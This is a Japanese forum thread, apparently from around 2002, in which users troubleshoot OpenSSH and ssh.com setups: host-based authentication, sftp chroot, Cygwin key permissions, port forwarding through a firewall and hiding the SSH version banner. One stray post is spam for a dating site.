クライアントを使える点でかなりいいんだけど、起動するまでの手順が
めんどくさい。『FTP to SFTP bridge』専用のソフトがほしい。

あと、JavaだからUSBメモリ等で持ち運んだとしてもJRE入ってない
と出先で動かない･･･。

JAVA以外で同様の機能を実現してるソフトってどっかにない？

hosts.equivを使って認証させたいんですが、
/etc/ssh/sshd_configに

RhostsAuthentication yes

としても、アクセスするとパスワードを求められます。
クライアントでは/etc/ssh/ssh_configで
Protocol 1
RhostsAuthentication yes
としています。
バージョンはサーバが3.4pでクライアントが3.5p　ともにlinuxです。
足りない設定とかあるんでしょうか。

ちなみにプロトコル2では、HostbasedAuthentication では認証ができました。

hosts.equivなんか使ったら、ssh使う意味ないんでない。

>>403
/etc/ssh/ssh_known_hosts にクライアントホストの
公開鍵(っていうんだっけ？)は登録してる?
ssh でクライアントにはじめてアクセスするときに
.ssh/known_hosts に蓄えられるやつ。

あと、クライアントの /usr/bin/ssh が suid root
されてないとダメ。

>>403
RhostsAuthenticationは公開鍵による認証が行なわれないので
使ってはいけない。
プロトコル2のHostbasedAuthenticationと同じなのは
RhostsRSAAuthenticationのほう。

RhostsRSAAuthenticationだと勘違いしてた。ゴメン。
RhostsAuthenticationならssh_known_hostsはいらない。

ただ >>406 の言う通りRhostsRSAAuthenticationを使う方がいい。

RhostsRSAAuthenticationは公開鍵認証が必要なため、
hosts.equivだけの認証を使いたかったので
プロトコル1のRhostsAuthenticationを選択したのですが…

RhostsAuthenticationでも/usr/bin/sshがsuidされていないと
ダメなんでしょうか

>>408
やったことないからしらない。スマン。
でもたぶんsuidされてないとダメだとおもうよ。
sshd はRhostsAuthenticationする場合、
特権portからの接続しか受け付けないから。

ところで、危険を承知で公開鍵認証したくない
シチュエーションってどんなの？

お知恵を拝借。
sftpするとcdコマンドで上位ディレクトリに移動できたりしますよね。
ProFTPやwu-FTPであれば、設定によりユーザはホームディレクトリから上位には行けないようにできますが、sftpではそのような設定は可能ですか？

あるいは、sshコマンドでの接続は全ユーザに許可するが、sftpコマンドでの接続は管理者だけに制限するとか、そんな設定って可能ですか？

http://www.pizzashack.org/rssh/index.shtml

chroot patchってどうして削られちゃったんだろうな…

>>409
ユーザがドキュソな場合。

411のrsshってsftpは許すけど、sshは制限するものですよね。たぶん（英語がにが。。）
ちょっとちがう。
412のchroot patchは。もうダメポ？

chmod o-x /usr/libexec/sftp-server
とか。

chroot patch なら unofficial なものがどっかにあったはず。
OpenBSD 版じゃなくて p のほうへの patch です。
(しかたないので自分で書いたのを使ってます)

>>409
ファイアーウォール内の計算サーバにアクセスする
バックエンド計算ホスト100台超からの認証。ただしrコマンド不可
こんなところです(^^;

FreeBSD 4.7R から Cygwin sshd に接続しようとしています。
公開鍵を Cygwin 上の ~/.ssh/authorized_keys に入れて

ssh -2 192.168.0.3

するとパスワードを聞かれます。
公開鍵で認証したいのですが何故パスフレーズを聞かれないのでしょうか？

ssh -2 -v 192.168.0.3

OpenSSH_3.4p1 FreeBSD-20020702, SSH protocols 1.5/2.0, OpenSSL 0x0090607f
Pseudo-terminal will not be allocated because stdin is not a terminal.
debug1: Reading configuration data /home/mona/.ssh/config
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Rhosts Authentication disabled, originating port will not be trusted.
debug1: ssh_connect: needpriv 0
debug1: Connecting to 192.168.0.3 [192.168.0.3] port 22.
debug1: Connection established.
debug1: identity file /home/mona/.ssh/id_rsa type -1
debug1: identity file /home/mona/.ssh/id_dsa type 2
debug1: Remote protocol version 1.99, remote software version OpenSSH_3.5p1
debug1: match: OpenSSH_3.5p1 pat OpenSSH*
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_3.4p1 FreeBSD-20020702
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: server->client aes128-cbc hmac-md5 none
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP

debug1: dh_gen_key: priv key bits set: 135/256
debug1: bits set: 1599/3191
debug1: SSH2_MSG_KEX_DH_GEX_INIT sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY
debug1: Host '192.168.0.3' is known and matches the DSA host key.
debug1: Found key in /home/mona/.ssh/known_hosts:1
debug1: bits set: 1566/3191
debug1: ssh_dss_verify: signature correct
debug1: kex_derive_keys
debug1: newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: waiting for SSH2_MSG_NEWKEYS
debug1: newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: done: ssh_kex2.
debug1: send SSH2_MSG_SERVICE_REQUEST
debug1: service_accept: ssh-userauth
debug1: got SSH2_MSG_SERVICE_ACCEPT
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is publickey
debug1: try privkey: /home/mona/.ssh/id_rsa
debug1: try pubkey: /home/mona/.ssh/id_dsa
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is keyboard-interactive
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is password
debug1: authentications that can continue: publickey,password,keyboard-interactive

Permission denied, please try again.
debug1: authentications that can continue: publickey,password,keyboard-interactive
Permission denied, please try again.
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: no more auth methods to try
Permission denied (publickey,password,keyboard-interactive).
debug1: Calling cleanup 0x804bed0(0x0)


----ここまで

publickey を飛ばしてしまっているようなのですが。

ssh -2 -i {secret key} {hostname}
…でダメ？

ssh -v -2 -i .ssh/id_dsa 192.168.0.3

してみましたが、やはりパスワードを聞かれました。


debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is publickey
debug1: try pubkey: .ssh/id_dsa
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is keyboard-interactive
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is password

接続先の ~/.ssh は 700 ~/.ssh/authorized_keys は 600 になっています。

ttp://chrootssh.sourceforge.net/
がありました。情報さんくす。

>>422
サーバー側は何と言ってる？　sshd -d で試したログ希望。

openssh-3.5p1 + openssl-0.9.6cでコンパイルしようとすると

configure: error: OpenSSL version header not found.

などといわれます。コンパイル環境は「Openblocks S」とredhat5.2です。
両方とも同じエラーが出るので困ってます。

ちなみにopensslは通常ユーザーのディレクトリにsslという
ディレクトリを作成して

./config --prefix=~user1/ssl shared

などとしてコンパイルしています。

>>425
configureスクリプトがインストールされているOpenSSLを見つけられないから
中断しちまったんだろ。OpenSSLがインストールされているディレクトリを
指定すればいいよ：
% ./configure --with-ssl-dir=[PATH]


ってかOpenSSHのマニュアル読めっつーの。

あとOpenSSLは最新版0.9.6gを使うようにな。セキュリティ上の問題がfixされてるから。

0.9.6gの間違いでした。「./configure --with-ssl-dir…」の方は
ちゃんと指定してました。

gnuのfileutilsを入れなおしたり、gccのバージョンをあげているうちに問題
は自然に解決しました（redhat5.2のみ）。あとはopenblocksの方を
なんとかすれば…

sshd -d してみました。長くなるので関係ありそう部分を。
なんで port 1349 を使っているんだ？

debug1: SSH2_MSG_NEWKEYS received
debug1: KEX done
debug1: userauth-request for user mona service ssh-connection method none
debug1: attempt 0 failures 0
Failed none for mona from 192.168.0.2 port 1349 ssh2
debug1: userauth-request for user mona service ssh-connection method publickey
debug1: attempt 1 failures 1
debug1: test whether pkalg/pkblob are acceptable
Failed none for mona from 192.168.0.2 port 1349 ssh2
debug1: temporarily_use_uid: 1000/513 (e=18/544)
debug1: trying public key file /home/mona/.ssh/authorized_keys
debug1: restore_uid: (unprivileged)
debug1: temporarily_use_uid: 1000/513 (e=18/544)
debug1: trying public key file /home/mona/.ssh/authorized_keys2
debug1: restore_uid: (unprivileged)
Failed publickey for mona from 192.168.0.2 port 1349 ssh2
debug1: userauth-request for user mona service ssh-connection method keyboard-interactive
debug1: attempt 2 failures 2
debug1: keyboard-interactive devs
debug1: auth2_challenge: user=mona devs=
debug1: kbdint_alloc: devices ''
Failed keyboard-interactive for mona from 192.168.0.2 port 1349 ssh2
debug1: userauth-request for user mona service ssh-connection method password
debug1: attempt 3 failures 3
Accepted password for mona from 192.168.0.2 port 1349 ssh2

>>428 419 さん
~/.ssh/authorized_keys のアクセス許可を、
ユーザ SYSTEM が読めるように変更するとうまくいくとおもいます。
Cygwin でファイルの許可モードを 600 にしてしまうと、
SYSTEM に対するアクセス許可のエントリがなくなってしまうようです。

>>403
> RhostsRSAAuthenticationは公開鍵認証が必要なため、
> hosts.equivだけの認証を使いたかったので
> プロトコル1のRhostsAuthenticationを選択したのですが…

> ファイアーウォール内の計算サーバにアクセスする
> バックエンド計算ホスト100台超からの認証。ただしrコマンド不可
> こんなところです(^^;

単にknown_hostsファイルを作るのが面倒なだけか?
だったら、ssh-keyscanを使えばよろし。
# ssh-keyscan -t dsa -f /etc/ssh/shosts.equiv > /etc/ssh/ssh_known_hosts

>>429
本当だ…。前に Unix 同士でこのパーミッションが 644 になってたから
失敗したから気をつけていたら、それが仇になるとは…。

ありがとうございました。

>>430
ssh-keyscanは知りませんでした。勉強になります。

>単にknown_hostsファイルを作るのが面倒なだけか?
ではなくて、100台超のマシンから一斉に繰り返しsshでアクセスしてると
sshdが反応しなくなってしまうので、RSA認証を省けばこの問題がクリアできるかと
思ったのですが。

>>432
tty (だっけ?) の数が足りてないんでないの?

>>432
もしくはsshd_configのMaxStartupsをいじるとか。

>>432
どうやって RSA 認証の問題だってわかったの?

>435
明確な根拠があるようならばこんなところで聞いていないと思われ

外出先のラップトップPC（win）のファイルを自宅のサーバー（linux, DDNS 利用）にインターネット経由で定期的にバックアップしたいと思っています。
cygwin をつかって、

1．rsync を ssh 経由で利用する
http://www2.i-e-c.co.jp/ssh6.html

2．これを cron でまわす
http://pcweb.mycom.co.jp/special/2002/cygwin/09.html

でできそうな気がするんですが、問題はパスワード入力です。
ssh-agent を立てればノーパスワードで可能、
と言うことなのですが、よくわかりません。
どうしたらいいか教えてください。

>>437
> どうしたらいいか教えてください。
ぐぐる。

>>435
ログを見るとlibpwdb.so.0が開けなくてこけているらしいので、
とりあえずホスト名だけの認証にすればいいのかなと思った次第です。
特にRSAって分ったわけではないですね…（^^；

>>437
パスフレーズなしの公開鍵認証を使う。

ここも参考にすれ。
http://www.jp.FreeBSD.org/QandA/HTML/2255.html

>>403氏
soが開けないって、１台から接続したときはきちんと動いてるんだよね？
だとするとファイルの開きすぎとか。

そしてなぜr系コマンド不可？
High Performance Computingを甘くみすぎてないか？
そもそも100台からいっせいに1台へ接続なんてHPCクラスタでも普通やらない。

http://ganglia.sourceforge.net/
のpre-2.5.0に入ってるgexec+authdならRSA認証で1000ノード以上でも大丈夫・・・らしい。
モニタリングの方しかいじったことないからよく知らないけど。

ttp://www.ayera.com/teraterm/
TeraTerm Pro Web 3.1.1 - Enhanced Telnet/SSH2 Client

不安定じゃありませんか？　日本語処理はさすが TeraTerm と言う感じですが
私の場合、　3000行くらいのファイルを読んだり、貼り付けたりすると毎回のようにフリーズします。
同じような症状の方いらっしゃいませんか？

>>442
漏れと同じような現象かな？

>>442
が〜ん、公開鍵暗号による認証ができないじゃないかよぅ。ｸﾞｽﾝ

ssh.com版がいつのまにか3.2.2になってた。

>>444
pagent.exe から取ってきてくれるらしいよ

>>446
あ、それ、PuTTY の話ですね。

PuTTY also includes pscp.exe, a secure copy program,
plink.exe, a command line interface to PuTTY backends and
pagent.exe, an SSH authentication agent for PuTTY, PSCP and Plink.
It does not include a counterpart for the newer sftp program
that is available on current SSH releases on UNIX systems.

TeraTerm Pro Web じゃ、無理ですか？

http://www.agemasukudasai.com/bloom/

>447
唐突にPuTTYの話を持ち出すわけ無いだろ・・・

Authenticated with partial success.
Permission denied ().

と言われてログインできなくなってしまったんですけど、
どうすれば解決できるでしょうか？

ちなみにクライアントは linux の ssh で version 3.4 です。
windows の teraterm + ttssh からはログインできるんですけど。

一介の一般ユーザなのでサーバのほうはいじれません。

-v

すんません。長いけど貼っつけます。

$ ssh -v xxx.xxx.ac.jp
OpenSSH_3.4p1 Debian 1:3.4p1-1, SSH protocols 1.5/2.0, OpenSSL 0x0090603f
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Rhosts Authentication disabled, originating port will not be trusted.
debug1: ssh_connect: needpriv 0
debug1: Connecting to xxx.xxx.ac.jp [xx.xx.xx.xx] port 22.
debug1: Connection established.
debug1: identity file /home/hoge/.ssh/identity type 0
debug1: identity file /home/hoge/.ssh/id_rsa type 1
debug1: identity file /home/hoge/.ssh/id_dsa type -1
debug1: Remote protocol version 1.99, remote software version 2.0.13 (non-commercial)
debug1: match: 2.0.13 (non-commercial) pat 2.0.13*,2.0.14*,2.0.15*,2.0.16*,2.0.17*,2.0.18*,2.0.19*
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: server->client 3des-cbc hmac-md5 none
debug1: kex: client->server 3des-cbc hmac-md5 none
debug1: dh_gen_key: priv key bits set: 187/384
debug1: bits set: 557/1024
debug1: sending SSH2_MSG_KEXDH_INIT
debug1: expecting SSH2_MSG_KEXDH_REPLY

つづきです。

debug1: Host 'xxx.xxx.ac.jp' is known and matches the DSA host key.
debug1: Found key in /home/hoge/.ssh/known_hosts:33
debug1: bits set: 496/1024
debug1: ssh_dss_verify: signature correct
debug1: kex_derive_keys
debug1: newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: waiting for SSH2_MSG_NEWKEYS
debug1: newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: done: ssh_kex2.
debug1: send SSH2_MSG_SERVICE_REQUEST
debug1: buggy server: service_accept w/o service
debug1: got SSH2_MSG_SERVICE_ACCEPT
debug1: authentications that can continue:
debug1: next auth method to try is publickey
debug1: try pubkey: /home/hoge/.ssh/id_rsa
debug1: authentications that can continue:
debug1: try privkey: /home/hoge/.ssh/id_dsa
debug1: next auth method to try is keyboard-interactive
debug1: authentications that can continue:
debug1: next auth method to try is password

最後の入力部分です。

Authenticated with partial success.
debug1: authentications that can continue:
Permission denied, please try again.
Authenticated with partial success.
debug1: authentications that can continue:
Permission denied, please try again.
Authenticated with partial success.
debug1: authentications that can continue:
debug1: no more auth methods to try
Permission denied ().
debug1: Calling cleanup 0x8063a9c(0x0)

>>447
なんか反応がなくて不安なので念のため書いておくと、
TeraTerm3 が pagent.exe から秘密鍵持ってきてくれまつ

>>455
s/pagent/pageant/
ですよね?

>456
> s/pagent/pageant/
> ですよね?

(ﾟДﾟ)ﾊｧ?

ssh -1 で繋がりました。原因は不明なのですが、
fwが protocol 2 に対応していないとか、
そんなところでしょうか。
うーん、悩ましい…
ちなみに、scp -1 ではまだエラーが出るんです…

>>458
> ssh -1 で繋がりました。

ttssh で繋がるならそうでしょう。そもそも Authenticated with
partial success.というメッセージが出るのは protocol 2 だけなの
で。ちなみに、このメッセージは sshd2_config で requiredAuthentications
に複数の method が指定されている場合、そのうちの一つに成功した
(かつまだ他に受けるべき method が残っている) ときに出ます。

> 原因は不明なのですが、
> fwが protocol 2 に対応していないとか、
> そんなところでしょうか。

いや、間違いなく sshd2 と会話が出来ているのでそういう問題ではな
いと思う。サーバはいじれないってことだけど、

>>debug1: Remote protocol version 1.99, remote software version 2.0.13 (non-commercial)
>>debug1: buggy server: service_accept w/o service
>>debug1: authentications that can continue:

バージョンが古いし、buggy server なんて言われてるし、使える
authentication method のリストは出てないし、と、サーバ側が怪し
いところだらけなので、そっちの問題じゃないかいな。まぁ、
protocol 1 で我慢できるならそれでもよいか。

> ちなみに、scp -1 ではまだエラーが出るんです…

ちなみに、scp には -1 ってオプションはない。だもんで、scp では
-o オプションで渡すか、もしくは ssh_config で設定するか、なん
だわな。

>>459
> いや、間違いなく sshd2 と会話が出来ているのでそういう問題ではな
> いと思う。

たしかにそうなんですが、たとえばYahoo!BBからアクセスするときは
protocol 2 でも何の問題もないんです。ところが、会社内部からだと前記の
問題が出るんです。だもんで会社のfwの問題なのかと。

> ちなみに、scp には -1 ってオプションはない。だもんで、scp では

うーん、man には
-1 Forces scp to try protocol version 1 only.
とあるんですけど…

ちなみに、scp -1 を実行すると、パスワードは受け付けてくれるのですが、
warning: Executing scp1 compatibility.
Executing ssh1 in compatibility mode failed.
で終ってしまいます。

>>460
> たしかにそうなんですが、たとえばYahoo!BBからアクセスするときは
> protocol 2 でも何の問題もないんです。ところが、会社内部からだと前記の
> 問題が出るんです。だもんで会社のfwの問題なのかと。

たしかに変な挙動ですが、firewall が関係してるとも思えないなぁ。
Yahoo!BB から使うときと会社から使うときで client の環境は一緒な
の？

> うーん、man には
> -1 Forces scp to try protocol version 1 only.
> とあるんですけど…

そりは ssh.com 版の scp じゃないすか。

> warning: Executing scp1 compatibility.
> Executing ssh1 in compatibility mode failed.

というのも ssh.com 版の挙動っぽいし。だとすると、

>>450
> ちなみにクライアントは linux の ssh で version 3.4 です。

と言ってたのと矛盾してるんで、なんか client の環境も変かも。ど
のバージョンの ssh/scp が使われているのか確かめるべし。

>>461
> Yahoo!BB から使うときと会社から使うときで client の環境は一緒な
> の？

まったく一緒です。ただ、Yahoo!BBではDHCPですが、会社では固定IPです。

> そりは ssh.com 版の scp じゃないすか。

> と言ってたのと矛盾してるんで、なんか client の環境も変かも。ど
> のバージョンの ssh/scp が使われているのか確かめるべし。

Debian で ssh package を入れたんですけど…

$ ssh -V
OpenSSH_3.4p1 Debian 1:3.4p1-1, SSH protocols 1.5/2.0, OpenSSL 0x0090603f

scp も同じ ssh package に付属するやつです。version の確認方法がわかり
ませんが。

>>462
> Debian で ssh package を入れたんですけど…

debian の openssh patch を見てみたら、たしかに scp が -[12] オ
プションを受け付けるように修正されるのね。うーむ、そんなことま
でやってくれやがるのか、debian は。

> scp も同じ ssh package に付属するやつです。version の確認方法がわかり
> ませんが。

scp -v とかで実際に動かしてみればある程度分かる。しかし、

>>461
> > warning: Executing scp1 compatibility.
> > Executing ssh1 in compatibility mode failed.

というような変更までは debian の patch もやってないしなぁ。とか
書いてたら気がついた。scp を起動すると、サーバ側でも scp プログ
ラムを呼ぶようになってるんで、こいつはサーバ側の ssh.com 版
scp が出してるメッセージって可能性はあるか。

だとすればやっぱサーバ側に手を入れてもらわないとどうしようもな
さそう。

> >>462
> だとすればやっぱサーバ側に手を入れてもらわないとどうしようもな

サーバ側の /etc/sshd_config なら見ることができます。文句も言えるとは思
うんですが何て言えばいいですかね？　（もうほぼ部外の人間なのでそう簡単
に対処してくれるとは思えませんけれど）

>>464
>>450には
| Authenticated with partial success.
| Permission denied ().
| と言われてログインできなくなってしまったんですけど、
| どうすれば解決できるでしょうか?

と書いてあるますが、以前はできてたんですか?
だとすれば、それからいままでの間のserver/client双方の変更を
元に戻すことは可能ですか?

>>465
> 以前はできてたんですか?

できてました。というか、今でも会社以外からはできています。

> だとすれば、それからいままでの間のserver/client双方の変更を
> 元に戻すことは可能ですか?

サーバはいじれないからわからないですが、クライアントの ssh 関係はいじっ
てません。問題は設定の変更ではなくてネットワーク環境の変化だと思います。

>>463
> こいつはサーバ側の ssh.com 版 scp が出してるメッセージって可能性はあるか。

サーバで man ssh したらこんなん出ました。
AUTHORS SSH Communications Security Ltd. For more information, see
http://www.ssh.fi.

> ssh -V
ssh: SSH Version 2.0.13

会社のfwでモニタされてるとか。サーバキーチェックした?

>>464
> サーバ側の /etc/sshd_config なら見ることができます。文句も言えるとは思
> うんですが何て言えばいいですかね？

OpenSSH 入れろや(ﾟДﾟ)ｺﾞﾙｧ。

ssh.com 版のままでも、新しいの (3.X) に変えれば直るんじゃないか
とは思うけど。

ただ、ssh.com に protocol 1 をサポートさせるためには 1.2.X もイ
ンストールしなきゃならない。

>>468
> 会社のfwでモニタされてるとか。サーバキーチェックした?

やっぱfw関係ありますか？　サーバキーのチェック方法がわかりません。
できれば会社のネットワーク管理者にはあまり関わりあいたくないのですが。

UDPをフォワーディングしたいんですが、どっかにパッチないですか?

>>471
netcatで。

なるほど。TCPの重さを嫌ったんだけど両端で変換しちまえばいいのか…
つかsshチャンネル上をTCPがそのまま通るわけじゃないから余計な心配だったようです。
経験値アップしました。サンクス

皆さんは公開鍵を、どうやってホストへ登録してもらってますか?

ホスト側では
PasswordAuthentication no
ChallengeResponseAuthentication no
となっています。

教えて君でスマン。
sshで別の計算機にログインしたとき
現在の計算機のカレントディレクトリを保持したままログインするには
どうすればいいですか？

>>475
> sshで別の計算機にログインしたとき
> 現在の計算機のカレントディレクトリを保持したままログインするには

『カレントディレクトリを保持したまま』の意味がいまいちよくつか
めないんだけど、local と同じ path が remote にもあってそこに
cd した上で作業したいってことかしら？

だとすれば、

$ ssh -t remote "cd `pwd`; /path/to/loginshell/in/remote"

なんて手はある。shell の path も両マシンで共通なら

$ ssh -t remote "cd `pwd`; $SHELL"

でも可。

できました。
教えてくれてどうもです。

PuTTYのスレで知ったのだけど、SSHv2に脆弱性が発見されているね。
CERTとrapid7の発表とで、脆弱性の影響を受けるバージョンが違うんだけど...。

ssh-3.2.2がアウトだと、入れ替え相当面倒くさいなぁ・・・。

OpenSSHはセーフだったか

やっぱりssh-3.2.2アウトらすぃ。鬱だ...。

http://www.ssh.com/company/newsroom/article/303/
ssh.com はDoS以外、大丈夫とのアナウンスが出た。
CERTも18日付けで更新されている。

ポートフォワーディングして、telnetでlocahostのそのポートにアクセスしよ
うとすると、

channel 2: open failed: connect failed: Connection refused

というエラーで終了してしまうんですけど、どうやったらアクセスできるよう
になるでしょうか？　具体的にはfirewallを越えてPOPのフォワーディングを
しようとしています。

>>482
port forward するときのコマンドライン晒せや。

XXXからYYYを介してpopサーバへの接続を試みています。

XXX$ ssh localhost -L 20110:YYY.YY.YY.jp:10110

一方、YYYでは

YYY$ ssh localhost -L 10110:pop.YY.YY.jp:110

としています。YYYからは

YYY$ telnet localhost 10110

でpopサーバとお話できるんですけど、XXXからだと

XXX$ telnet localhost 20110

はすぐにクローズされてしまいます。

>>484
なぜlocalhostにログインしてるの？
local-firewall-server
の形でforwardしたいなら
lcoal$ ssh firewall -L 10110:server:110
じゃないの？

>>484の方法でやるなら -g オプションが必要だけど、
セキュリティホールになりうるからお勧めできない。

ああ、全経路を暗号化したいのか。
なら

local$ ssh firewall -L 20110:server:10110

firewall$ ssh server -L 10110:server:110

かな。

違った。

local$ ssh firewall -L 20110:firewall:10110
firewall$ ssh server -L 10110:server:110

いちおうあの方法は管理者側の指示のようです。
popserverにはメール・アカウントしかないようでして、

firewall$ ssh server -L 10110:server:110

ではログインできません。

>>488
管理者がナニ考えているのか知らないけど、
>>484じゃlocal-firewall間が暗号化されていないよ。ssh使う意味無し。

serverにログインアカウント無いなら>>485を試してみて。
(ただし、この方法はfirewall-server間は暗号化されない)

>>489
-gで繋がりました。ありがとうございました。

後学のために、この-gがないと繋がらない理由と、これがセキュリティホール
になる仕組みを教えていただけると嬉しいです。

もうちょっとでクリスマス。。★彡
パートナーは見つかりました？(o^.^o)

http://petitmomo.com/mm/
ここがちょっぴりエッチ系のめぐが運営している出会いサイトです。
もしよかったら使ってみて、、、
ヨロシクです。

めぐ(^o^)-☆

>>490
マニュアル嫁。それでわからんかったら -g 使うの禁止。

>>490
-g オプション無しだと port forward で listen した port は localhost しか接続を許可しない。
>>484で外からアクセスして弾かれているので分かる。

-g オプションつけると port forward で listen した port への接続を無差別に許可する。
せっかく管理者がサーバーを firewall 内においているのに、外からアクセスする手段を与えてしまう。
悪意のある人がこれに気づくと DoS 程度は容易に行えるし、
管理者がサーバーソフトのアップデートを怠っていると最悪の場合 crack される可能性がある。

なので、 -g オプションの動作がよくわかっていなければ使ってはならない。
-g 付けるほうじゃなく、こっちを試してみて。
local$ ssh firewall -L 10110:server:110

>>493
うう、ご丁寧にありがとうございます。これでも通りました。

SSHのバナーを変える（消す）のってどうやるの？
SSH2だとBANNERっていうパラメータがsshd_configにあるみたいだけど、
SSH1だと使えないですか？

>>495
> SSHのバナーを変える（消す）のってどうやるの？

何を指してバナーと呼んでいる？

> SSH2だとBANNERっていうパラメータがsshd_configにあるみたいだけど、

この Banner という config option は設定すると

local$ slogin remote
逝ってよし
Last login: Thu Dec 26 17:42:38 2002 from *****.*******.***
remote$

てな感じで遊べる、というだけの代物で、デフォルトでは設定されちゃ
いないからあえて消す必要はない筈なんだが。

>>496
TCP/22をtelnetで叩くとSSHとOSのバージョンが出てきます。
これが気持ち悪いので消したいのですが。

>>497
> TCP/22をtelnetで叩くとSSHとOSのバージョンが出てきます。

正しくは SSH Protocol と Software のバージョン、ね。

♯ま、OS のバージョンまで入れてる variant がないとは言えないだ
♯ろけど。

> これが気持ち悪いので消したいのですが。

server/client 間のネゴに必要な情報なので消しちゃダメだし、ソー
スいじって recompile でもしない限りは変えられない。

>>498
>server/client 間のネゴに必要な情報なので消しちゃダメだし、
あ、これ見てるのか。じゃ消しちゃダメですね。

ちなみにうちではこう表示されてます。
>SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702

>>498
>>499
ソースいじってそれ（>>499の例では「OpenSSH_3.4p1 FreeBSD-20020702」の部
分）を消し、recompile すると正常に動作しなくなったとかいう話がどっかの雑誌
に載ってたような気がします。
# これに関しては
# 　http://www.openssh.com/txt/draft-ietf-secsh-transport-14.txt
# の「3.2 Protocol Version Exchange」に書かれてますな…過去のバージョンと
# の兼ね合いのために存在するっぽい？

ちなみに、>>499の例でいう「SSH-1.99」の部分はどのバージョンのSSHプロトコル
で通信する（orできる）かを相手に伝えるためのもの。消すと一切通信できなくなり
ます(藁)
# >>497（=>>499）氏はｸﾗｯｶｰ共に余計な情報を渡したくないと思ったのかな。

>>500
># の「3.2 Protocol Version Exchange」に書かれてますな…過去のバージョンと
># の兼ね合いのために存在するっぽい？
RFCに書いてあるんじゃしょうがないですね。

># >>497（=>>499）氏はｸﾗｯｶｰ共に余計な情報を渡したくないと思ったのかな。
そうなんですが。
ﾗｯﾊﾟｰではじいたIPからつないでも、この文字列だけは出てきちゃうんです。

>>501
> ﾗｯﾊﾟｰではじいたIPからつないでも、この文字列だけは出てきちゃうんです。
「ﾗｯﾊﾟｰで」って具体的に何よ？　TCP Wrapperか??
あと、「はじいた」つもりでも実際ははじかれていないような気も…

>>501
そんなに嫌がるならパケットをフィルタしちゃえば。
ラッパーで弾くならフィルタリングも出来るよね。

>>502
なんか台無しにするようなコメントになってしまったか。すまそ。

「はじく」＝「TCP Wrapperなどでアクセス制限をかける」と考えてたんだが、
もしそうなら>>501の「この文字列だけは出てきちゃうんです」が意味不明。
　→実はアクセス制限がかかっていなかった（はじかれてなかった）、というｵﾁか？

% telnet サーバのホスト名 22
してその文字列が表示されるってことかい？>>501

>>501氏の「はじく」ってまた別の意味か??

>>503　(ﾟ∀ﾟ)ｷﾆｽﾙﾅ

>>505
> % telnet サーバのホスト名 22
> してその文字列が表示されるってことかい？>>501

ｽﾏｿ、>>497に書いてあったね。鬱氏

>>501
sshdをinetdから起動するようにすると、
libwrapではじかれたとき、何も出ないようになりませんか。

>>507
inetd から起動しなくても
libwrap ではじかれると何も出ないね。

>>502 >>505
TCP Wrapperでアクセス制限しています。
lddで確認したらlibwrapにリンクしてましたし、
実際、拒否IPからsshでつなぎにいくと弾かれます。

で、同じく拒否IPから-vオプション付けて試してみたら、

debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Rhosts Authentication disabled, originating port will not be trusted.
debug1: ssh_connect needpriv 0
debug1: Connecting to xxx.xxx.xxx.xxx [xxx.xxx.xxx.xxx] port 22.
debug1: Connection established.
debug1: identity file /home/hoge/.ssh/identity type 0
ssh_exchange_identification: Connection closed by remote host

と、コネクションを張った後（つまりバージョンネゴシエーション
が完了した後？）、認証を始める段階になって弾かれているようでした。

常駐daemonの場合、inetdからの起動と違ってサーバプロセスの
起動自体を制限してるわけではないから、というのがﾋﾞﾝｺﾞでしょうか？

>>503
>そんなに嫌がるならパケットをフィルタしちゃえば。
>ラッパーで弾くならフィルタリングも出来るよね。
なわけで素直にフィルタかけようと思います。
お世話様でした。

>>508
>inetd から起動しなくても
>libwrap ではじかれると何も出ないね。
え、そうなんですか。
ひょっとして変なソース掴まされてるとか (((；ﾟДﾟ))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

♯昨夜試しに Banner option 設定したのを忘れて、今朝よそからログ
♯インしたらいきなりマシンに『逝ってよし』と言われて激しく鬱。

>>509
> で、同じく拒否IPから-vオプション付けて試してみたら、
> <snip>
> と、コネクションを張った後（つまりバージョンネゴシエーション
> が完了した後？）、認証を始める段階になって弾かれているようでした。

上で言ってる Connection established. は TCP レベルでのコネクショ
ンのことなので SSH レベルでのバージョンネゴはまだその先。

で、sshd のソースを見る限りでは、LIBWRAP が有効な場合 TCP コネ
クション確立とバージョンネゴの間で切断されるようになってるから、
サーバのバージョンは表示されない筈。やっぱなんか動きが変かも。

手元のソースは OpenBSD のなんで、FreeBSD だとその辺が違ってる可
能性はあるかもしれんが…。

>>509
> TCP Wrapperでアクセス制限しています。
どんなふうに?

sshdをいったん殺して再起動したら表示されなくなりました。
HUPシグナルじゃだめだったんでしょうか。

激しく当たり前だったらごめんなさい。回線切って首吊ってきます。

>>513
> sshdをいったん殺して再起動したら表示されなくなりました。
> HUPシグナルじゃだめだったんでしょうか。

うんにゃ。HUP シグナルを送るのは sshd を再起動するのとまったく
同じ効果がある (というか HUP が送られたときに行なわれる処理は再
起動そのもの。see sshd(8))。

あと、単に /etc/hosts.deny に新しくホストを追加するくらいなら別
に再起動 (したり HUP シグナルを送ったり) する必要はない。

